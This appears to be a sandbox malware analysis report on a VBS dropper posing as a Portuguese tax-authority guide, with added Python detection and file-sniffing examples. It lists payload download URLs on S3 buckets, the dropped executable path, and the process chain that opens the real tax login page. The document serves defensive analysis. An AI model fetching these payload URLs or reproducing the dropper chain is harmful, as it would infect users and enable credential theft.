Source: playoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.dr | String found in binary or memory: https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/DanceMarine.mpeg
Source: chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.dr | String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_92.4.dr, chromecache_120.4.dr | String found in binary or memory: https://info.portaldasfinancas.gov.pt/pt/at/Pages/Encarregado_protecao_dados.aspx
Source: chromecache_92.4.dr, chromecache_120.4.dr | String found in binary or memory: https://info.portaldasfinancas.gov.pt/pt/quem_somos/privacidade/Pages/privacidade.aspx
Source: wscript.exe, 00000000.00000003.2226243533.00000233BFCCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045060057.00000233BD94A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047326034.00000233BE771000.00000004.00000020.00020000.00000000.sdmp, GuiaAT256201.vbs | String found in binary or memory: https://playoffchampions.s3.eu-north-1.amazonaws.com/xboxtv.mpeg
Source: wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginFo
Source: wscript.exe, 00000000.00000003.2226243533.00000233BFCCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045060057.00000233BD94A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053801050.00000233BA521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047326034.00000233BE771000.00000004.00000020.00020000.00000000.sdmp, GuiaAT256201.vbs | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP76R
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP86
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP9
Source: wscript.exe, 00000000.00000003.2053993426.00000233BA572000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPC:
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPL-
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPQ60
Source: wscript.exe, 00000000.00000003.2050678399.00000233BA6FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPc
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPp
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA521000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPtCookiesgCj
Source: unknown | Network traffic detected: HTTP traffic on port 443, client to server (local port -> 443), from local ports 49673, 49674, 49675, 49703, 49704, 49706, 49712-49722, 49724-49738, 49740-49745, 49748, 49750-49753 and 50029 (44 rows)
Source: unknown | Network traffic detected: HTTP traffic on port 443, server to client (443 -> local port), to local ports 49703, 49704, 49706, 49712-49722, 49724-49738, 49740-49745, 49748, 49750-49753 and 50029 (41 rows; no server-to-client row is listed for 49673, 49674 or 49675)
Source: unknown | HTTPS traffic detected: 3.5.216.50:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: GuiaAT256201.vbs | Initial sample: Strings found which are longer than 50 characters
Source: playoff.exe.0.dr | Static PE information: Number of sections : 11 > 10
Source: classification engine | Classification label: mal76.evad.winVBS@18/69@11/9
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xboxtv[1].mpeg
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs"
Source: C:\Users\Public\xboxtv\playoff.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (opened twice)
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,14633557413047616428,5381384248003885766,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\xboxtv\playoff.exe "C:\users\public\xboxtv\playoff.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAPJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\xboxtv\playoff.exe "C:\users\public\xboxtv\playoff.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,14633557413047616428,5381384248003885766,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\wscript.exe | Sections loaded (in load order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll,
vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll,
wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, windows.storage.dll, propsys.dll, urlmon.dll, iertutil.dll, srvcli.dll,
netutils.dll, windows.shell.servicehostbuilder.dll, onecoreuapcommonproxystub.dll, ieframe.dll, netapi32.dll, winhttp.dll,
wkscli.dll, windows.staterepositoryps.dll, edputil.dll, secur32.dll, sspicli.dll, mlang.dll, wininet.dll, policymanager.dll,
msvcp110_win.dll, wintypes.dll, onecorecommonproxystub.dll, msxml3.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll,
iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, dpapi.dll,
gpapi.dll, ncrypt.dll, ncryptsslp.dll, msdart.dll, apphelp.dll, zipfldr.dll, dui70.dll, duser.dll, chartv.dll, oleacc.dll,
atlthunk.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wtsapi32.dll,
winsta.dll, textshaping.dll, windows.fileexplorer.common.dll, explorerframe.dll, shdocvw.dll, linkinfo.dll, ntshrui.dll,
cscapi.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll
Source: C:\Users\Public\xboxtv\playoff.exe | Sections loaded (in load order): wininet.dll, version.dll, wtsapi32.dll, uxtheme.dll,
kernel.appcore.dll, winsta.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll,
wintypes.dll (3 occurrences), dwmapi.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Google Drive.lnk.2.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: GuiaAT256201.vbs | Static file information: File size 7413387 > 1048576
Source: playoff.exe.0.dr | Static PE information: section name: .didata
Source: C:\Users\Public\xboxtv\playoff.exe | Code function: 7_2_00000074B237DF0C pushfd ; retf 7_2_00000074B237DF79
Source: C:\Users\Public\xboxtv\playoff.exe | Code function: 7_2_00000074B237A258 push ecx; retf 7_2_00000074B237A259
Source: C:\Users\Public\xboxtv\playoff.exe | Code function: 7_2_00000074B237DEDC pushfd ; retf 7_2_00000074B237DF79
Source: C:\Users\Public\xboxtv\playoff.exe | Code function: 7_2_00000074B237E84B pushad ; ret 7_2_00000074B237E87C
Source: C:\Users\Public\xboxtv\playoff.exe | Code function: 7_2_00000074B237A838 push ecx; retf 7_2_00000074B237A839
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\Public\xboxtv\playoff.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Users\Public\xboxtv\playoff.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\ FullSizeInformation
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Files-
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2178582283.00000233BA5AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157185248.00000233BA5B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2178563168.00000233BC702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xboxtv/playoff.exea-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | File created: playoff.exe.0.dr
Source: C:\Windows\System32\wscript.exe | Network Connect: 3.5.216.50 443
Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\xboxtv\playoff.exe "C:\users\public\xboxtv\playoff.exe"
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\Public\xboxtv.zip VolumeInformation (5 occurrences)
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\ VolumeInformation (4 occurrences)
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
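The four Sigma titles and the behaviour evidence above describe a single dropper chain: wscript.exe connects to 3.5.216.50:443, writes C:\Users\Public\xboxtv.zip and C:\Users\Public\xboxtv\playoff.exe, launches playoff.exe, and opens Chrome on the legitimate acesso.gov.pt login form. The Python below is an added example written for this page; it is not Joe Sandbox code and not the Sigma rules themselves. It implements the logic those rule titles imply over a handful of constructed Sysmon-style events (the paths, IP and ports are the report's; the event field names, the suspicious-folder list and the dropped-extension list are assumptions) and then correlates script-host file writes with script-host child processes, which is the drop-then-execute step that distinguishes a dropper from a script that merely touches the network.

```python
import ipaddress
from pathlib import PureWindowsPath

# Script hosts whose file writes and network activity deserve scrutiny.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Assumed drop locations, modelled on the report's C:\Users\Public hit; extend to taste.
SUSPICIOUS_FOLDERS = (r"C:\Users\Public", r"C:\ProgramData", r"C:\Windows\Temp", r"C:\PerfLogs")

# Assumed file types a script host has no business writing into those folders.
DROPPED_EXTENSIONS = {".exe", ".dll", ".zip", ".scr", ".ps1", ".vbs", ".js"}


def image_name(path: str) -> str:
    """Lower-cased executable name from a Windows path."""
    return PureWindowsPath(path).name.lower()


def in_suspicious_folder(path: str) -> bool:
    """True when the path lies beneath one of SUSPICIOUS_FOLDERS (case-insensitive)."""
    low = path.lower()
    return any(low.startswith(folder.lower() + "\\") for folder in SUSPICIOUS_FOLDERS)


def is_non_local(ip: str) -> bool:
    """Non-local means routable on the Internet: not RFC1918, loopback, link-local, multicast or 0.0.0.0."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_unspecified)


def evaluate(events):
    """Return (rule, evidence) for every event that trips one of the three rules."""
    hits = []
    for e in events:
        kind = e["event"]
        if kind == "FileCreate" and image_name(e["Image"]) in SCRIPT_HOSTS:
            target = e["TargetFilename"]
            if in_suspicious_folder(target) and PureWindowsPath(target).suffix.lower() in DROPPED_EXTENSIONS:
                hits.append(("Script host file write to suspicious folder", target))
        elif kind == "ProcessCreate" and in_suspicious_folder(e["Image"]):
            hits.append(("Execution from suspicious folder", e["Image"]))
        elif (kind == "NetworkConnect" and image_name(e["Image"]) in SCRIPT_HOSTS
              and is_non_local(e["DestinationIp"])):
            hits.append(("Script initiated connection to non-local network",
                         f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
    return hits


def dropper_chains(events):
    """Correlate: paths a script host wrote and then launched as a child process."""
    written = {e["TargetFilename"].lower() for e in events
               if e["event"] == "FileCreate" and image_name(e["Image"]) in SCRIPT_HOSTS}
    return sorted(e["Image"] for e in events
                  if e["event"] == "ProcessCreate"
                  and image_name(e["ParentImage"]) in SCRIPT_HOSTS
                  and e["Image"].lower() in written)


# Constructed Sysmon-style events; the paths, IP and ports are the ones in this report.
WSCRIPT = r"C:\Windows\System32\wscript.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PLAYOFF = r"C:\Users\Public\xboxtv\playoff.exe"
EVENTS = [
    {"event": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe", "Image": WSCRIPT,
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs"'},
    {"event": "NetworkConnect", "Image": WSCRIPT, "DestinationIp": "3.5.216.50", "DestinationPort": 443},
    {"event": "FileCreate", "Image": WSCRIPT,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xboxtv[1].mpeg"},
    {"event": "FileCreate", "Image": WSCRIPT, "TargetFilename": r"C:\Users\Public\xboxtv.zip"},
    {"event": "FileCreate", "Image": WSCRIPT, "TargetFilename": PLAYOFF},
    {"event": "ProcessCreate", "ParentImage": WSCRIPT, "Image": CHROME,
     "CommandLine": '"' + CHROME + '" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP'},
    {"event": "ProcessCreate", "ParentImage": WSCRIPT, "Image": PLAYOFF,
     "CommandLine": r'"C:\users\public\xboxtv\playoff.exe"'},
    {"event": "NetworkConnect", "Image": CHROME, "DestinationIp": "142.250.185.196", "DestinationPort": 443},
    # A LAN connection from the script host: must not trip the non-local rule.
    {"event": "NetworkConnect", "Image": WSCRIPT, "DestinationIp": "192.168.2.5", "DestinationPort": 443},
]

if __name__ == "__main__":
    for rule, evidence in evaluate(EVENTS):
        print(f"{rule}: {evidence}")
    print("dropper chain:", dropper_chains(EVENTS))
```

Two design points. The browser-cache write and the LAN connection are in the sample on purpose: a rule that fires on every script-host file write or every script-host socket is unusable, so the folder list and the local-address test carry the precision. And the correlation in dropper_chains is what turns three independent alerts into one story, which is what an analyst reading this report is doing by hand when they match "File created: C:\Users\Public\xboxtv\playoff.exe" against "Process created: C:\Users\Public\xboxtv\playoff.exe".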
MITRE ATT&CK matrix, one line per tactic. Bracketed digits are the report's signature-count badges exactly as extracted; techniques without a badge are the matrix's unpopulated placeholder cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Scripting [21]; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Exploitation for Client Execution [1]; Scheduled Task/Job; At; Cron
Persistence: Scripting [21]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Login Hook
Privilege Escalation: Process Injection [111]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Login Hook
Defense Evasion: Masquerading [1]; Process Injection [111]; Obfuscated Files or Information [2]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Behavior Graph (ID 1597922; sample GuiaAT256201.vbs; start date 23/01/2025; architecture WINDOWS; score 76). Bracketed numbers after a process are the graph's created-registry-value / created-file counters as extracted.

Resolved hosts: s3-r-w.eu-north-1.amazonaws.com; playoffchampions.s3.eu-north-1.amazonaws.com
Sigma detections on the sample: WScript or CScript Dropper; Windows Shell/Scripting Application File Write to Suspicious Folder; Execution from Suspicious Folder; Script Initiated Connection to Non-Local Network

wscript.exe [1 20], started
    Network: s3-r-w.eu-north-1.amazonaws.com 3.5.216.50, port 443 (local port 49704), AMAZON-02, United States
    Dropped: C:\Users\Public\xboxtv\playoff.exe (PE32+); C:\Users\Public\xboxtv.zip (Zip)
    Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Started: chrome.exe [8]; playoff.exe [1]

chrome.exe [8], started by wscript.exe
    Network: 192.168.2.5, port 443 (local ports 49499, 49703), unknown; 192.168.2.13, unknown; 3 other IPs or domains
    Started: chrome.exe (child)

chrome.exe (child), started by chrome.exe
    Network: static.portaldasfinancas.gov.pt 62.28.254.209, port 443 (local ports 49718, 49724), MEO-EMPRESASPT, Portugal; www.acesso.gov.pt 62.28.254.215, port 443 (local ports 49706, 49712), MEO-EMPRESASPT, Portugal; www.google.com 142.250.185.196, port 443 (local ports 49735, 50029), GOOGLEUS, United States

playoff.exe [1], started by wscript.exe
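The payload URL ends in .mpeg and the browser cache entry is xboxtv[1].mpeg, yet what the script leaves on disk is C:\Users\Public\xboxtv.zip (type Zip) from which the PE32+ playoff.exe is executed. Extension and content disagree, and that disagreement is the check to automate when triaging a download like this one. The Python below is an added example for this page, not code from the report or from the sample: it sniffs a blob by magic bytes (ZIP local-file header, MPEG program-stream or sequence header, PE with PE32 versus PE32+ decided by the optional-header magic), compares the result with the filename extension, and lists the members of a ZIP with their sniffed types. The ZIP and the PE stand-in are constructed in memory; the member name xboxtv/playoff.exe is the one in the report's memory string, and the expected-type table is an assumption.

```python
import io
import struct
import zipfile
from pathlib import PureWindowsPath


def sniff(data: bytes) -> str:
    """Classify a blob by magic bytes; the filename extension is deliberately not consulted."""
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:4] in (b"\x00\x00\x01\xba", b"\x00\x00\x01\xb3"):
        return "mpeg"  # MPEG program stream pack header / video sequence header
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00" and len(data) >= e_lfanew + 26:
            # Optional-header magic follows the 20-byte COFF header: 0x10B = PE32, 0x20B = PE32+.
            magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
            return "pe32+" if magic == 0x20B else "pe32"
        return "mz"
    return "unknown"


# Assumed mapping of extension to acceptable sniffed types; anything else is a disguise.
EXPECTED = {
    ".mpeg": ("mpeg",), ".mpg": ("mpeg",),
    ".zip": ("zip",),
    ".exe": ("pe32", "pe32+"), ".dll": ("pe32", "pe32+"),
}


def extension_mismatch(name: str, data: bytes):
    """None when content matches the extension (or the extension is unknown), else (extension, actual type)."""
    ext = PureWindowsPath(name).suffix.lower()
    expected = EXPECTED.get(ext)
    if expected is None:
        return None
    kind = sniff(data)
    return None if kind in expected else (ext, kind)


def triage_archive(data: bytes):
    """(member name, sniffed type) for each file in a ZIP blob, so a PE inside a 'media' download stands out."""
    members = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                members.append((info.filename, sniff(zf.read(info))))
    return members


def fake_pe32plus() -> bytes:
    """Constructed minimal PE32+ stand-in: only the headers sniff() needs, not a loadable image."""
    hdr = bytearray(0x40 + 26)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)        # e_lfanew: PE signature lives at 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<H", hdr, 0x40 + 24, 0x20B)  # optional header magic: PE32+
    return bytes(hdr)


def build_sample_download() -> bytes:
    """Constructed stand-in for the xboxtv.mpeg download: a ZIP carrying xboxtv/playoff.exe."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("xboxtv/playoff.exe", fake_pe32plus())
    return buf.getvalue()


if __name__ == "__main__":
    blob = build_sample_download()
    print("xboxtv.mpeg sniffs as", sniff(blob), "; mismatch:", extension_mismatch("xboxtv.mpeg", blob))
    print("archive members:", triage_archive(blob))
```

Run against the real cache file the result would be ("zip" for a ".mpeg" name) plus one PE32+ member, which is exactly the two facts the report states separately under "File created" and "Dropped". A genuine MPEG download passes the same check, so the rule does not fire on media that merely happens to come from an S3 bucket.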

No Antivirus matches
URL scan results (Source | Detection | Scanner | Label):
http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/ | 0% | Avira URL Cloud | safe
https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/CafeMusic.mpeg | 0% | Avira URL Cloud | safe
https://info.portaldasfinancas.gov.pt/pt/quem_somos/privacidade/Pages/privacidade.aspx | 0% | Avira URL Cloud | safe
https://playoffchampions.s3.eu-north-1.amazonaws.com/xboxtv.mpeg | 0% | Avira URL Cloud | safe
https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/DanceMarine.mpeg | 0% | Avira URL Cloud | safe
http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-pref | 0% | Avira URL Cloud | safe
https://info.portaldasfinancas.gov.pt/pt/at/Pages/Encarregado_protecao_dados.aspx | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
static.portaldasfinancas.gov.pt | 62.28.254.209 | true | false | - | high
s3-r-w.eu-north-1.amazonaws.com | 3.5.216.50 | true | false | - | high
www.google.com | 142.250.185.196 | true | false | - | high
www.acesso.gov.pt | 62.28.254.215 | true | false | - | high
playoffchampions.s3.eu-north-1.amazonaws.com | unknown | unknown | false | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://www.acesso.gov.pt/autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/css/sa-custom.css?cb=5.2.14 | false | - | high
https://static.portaldasfinancas.gov.pt/app/pfstatic_static/js/pf-footer.js | false | - | high
